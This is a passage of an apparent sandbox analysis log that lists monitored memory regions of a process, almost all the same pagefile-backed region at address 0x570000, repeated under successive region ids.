1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20797 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20798 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20799 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20800 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20801 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20802 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20803 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20804 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20805 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20806 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20807 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20808 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20809 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20810 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20811 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20812 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20813 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20814 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20815 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20816 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20817 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20818 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20819 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20820 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20821 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20822 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20823 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20824 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20825 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20826 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20827 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20828 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20829 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20830 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20831 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20832 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20833 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20834 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20835 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20836 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20837 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20838 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20839 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20840 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20841 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20842 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20843 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20844 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20845 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20846 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20847 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 20848 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 20849 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20850 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20851 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20852 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20853 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20854 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20855 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20856 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20857 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20858 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20859 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20860 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20861 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20862 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20863 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20864 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20865 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20866 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20867 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20868 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20869 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20870 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20871 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20872 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20873 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20874 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20875 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20876 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20877 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20878 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20879 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20880 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20881 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20882 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20883 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20884 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20885 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20886 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20887 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20888 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20889 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20890 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20891 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20892 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20893 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20894 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20895 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20896 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20897 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20898 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20899 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20900 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20901 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20902 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20903 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20904 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20905 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20906 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20907 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20908 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20909 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20910 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20911 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20912 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20913 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20914 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20915 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20916 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20917 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20918 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20919 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20920 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20921 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20922 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20923 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20924 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20925 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20926 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20927 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20928 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20929 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20930 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20931 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20932 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20933 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20934 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20935 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20936 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20937 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20938 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20939 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20940 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20941 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20942 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20943 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20944 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20945 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20946 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20947 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20948 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20949 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20950 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20951 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20952 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20953 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20954 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20955 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20956 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20957 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20958 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 20959 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 20960 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20961 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20962 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20963 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20964 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20965 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20966 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20967 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20968 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20969 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20970 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20971 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20972 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20973 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20974 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20975 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20976 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20977 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20978 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20979 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20980 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20981 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20982 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20983 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20984 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20985 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20986 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = 